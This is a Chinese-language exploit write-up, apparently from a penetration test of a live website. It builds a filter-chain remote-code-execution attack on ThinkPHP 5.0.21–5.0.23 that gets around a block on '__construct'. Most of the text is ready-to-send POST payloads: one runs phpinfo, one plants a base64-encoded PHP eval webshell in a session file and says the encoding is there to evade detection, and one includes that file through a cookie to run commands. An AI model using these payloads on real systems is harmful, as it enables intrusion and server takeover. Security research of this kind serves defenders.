起因

在对某网站渗透过程中，通过报错页面发现网站架构为ThinkPHP 5.0.23，存在method RCE漏洞。但是，使用常规payload提示__construct关键字被禁用，因此payload无法生效。但是这个漏洞的关键点不在于__construct方法，而是Request类的method方法可以让我们调用类中的任意方法，因此，开始寻找另一条利用链。

分析

• 漏洞利用点
  • Request类的method方法可以让我们调用类中的任意方法

• 分析
  • 该类为ThinkPHP的请求类，主要存放请求中的各种信息，没有方法直接执行代码，但是通过filter链可以间接执行代码
• 难点：
  • 之前的payload都是通过__construct函数覆写请求中的参数信息以及filter链，从而控制调用的函数以及参数
  • filter函数仅能注册filter链，无法覆写参数
• 思路
  • 通过filter链将无法控制的参数引导到可以控制的参数

构造

• 由于官网不再提供5.0.23版本的下载，此处使用5.0.22完整版做实验，下载地址
• PHP版本：7.3.4

开启debug模式

0. filter链

• 开启debug模式下，进入我们filter链的第一个参数为server[REQUEST_METHOD]，即字符串POST
• 调用堆栈如图所示

1. phpinfo

• phpinfo函数可以接受一个整数作为参数，但是，当传入的参数为0的时候，不会输出任何信息，因此intval函数无法使用

• 需要寻找一个函数可以接受字符串作为参数，并能够返回一个不为0的整数，以供后续phpinfo使用
• 此处使用error_report函数，原型如下：

• 因此构造POC如下

post :  0=error_reporting&1=phpinfo&_method=filter

• filter链为

POST->error_reporting->phpinfo->输出信息

• 成功执行phpinfo

2. 写入session

• 直接使用think\Session::set即可将经过filter链的数据全部写入，防止查杀，添加一个base64编码
• POC

POST
/index.php?a=PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2MnXSkpOyA/Pg==
0=base64_decode&1=think\Session::set&2=error_reporting&_method=filter

• filter链为

输入数据->bases64_decode->think\Session::set->写入session

• 成功写入

3. 包含session

• 包含不存在的文件时，会报错，导致程序停止运行，因此，必须在第一个参数POST进入filter链的时候，进行文件包含

• 此处的难点就转变为了将POST字符转换为文件名

• 经过查找，发现\think\Cookie::get方法可以返回Cookie中的字符串，从而得到文件名
• 构造POC

POST /index.php
Cookie: POST=session文件名
0=\think\Cookie::get&1=think\__include_file&2=error_reporting&_method=filter&c=cGhwaW5mbytgpOw==

• 成功执行命令

未开启debug模式

• 暂未找到利用链

• 发现一个有趣的现象，在此记录一下

• 当程序执行流程中发生Error时，error_handler会触发利用链

  • 关闭APP_DEBUG
  • 在route.php文件中引入错误

  

  • 发送payload，即可成功触发

  

• 原因

  • \think\Error类中的appError方法在处理错误的过程中，会对参数进行收集，从而触发filter链
• 其他
  • 如果可以在注册完filter链之后，引起框架error便可以触发payload
  • 可惜暂时未能找到引起框架error的方法

其它版本

• 5.0.21~5.0.23之间：以上payload均适用
• 5.0其它版本需要更改包含session的payload

POST
/index.php?a=C:/phpstudy_pro/Extensions/tmp/tmp/sess_v6mip0bjhb29prtsiv69f12j93
1=think\__include_file&2=error_reporting&_method=filter&c=cGhwaW5mbygpOw==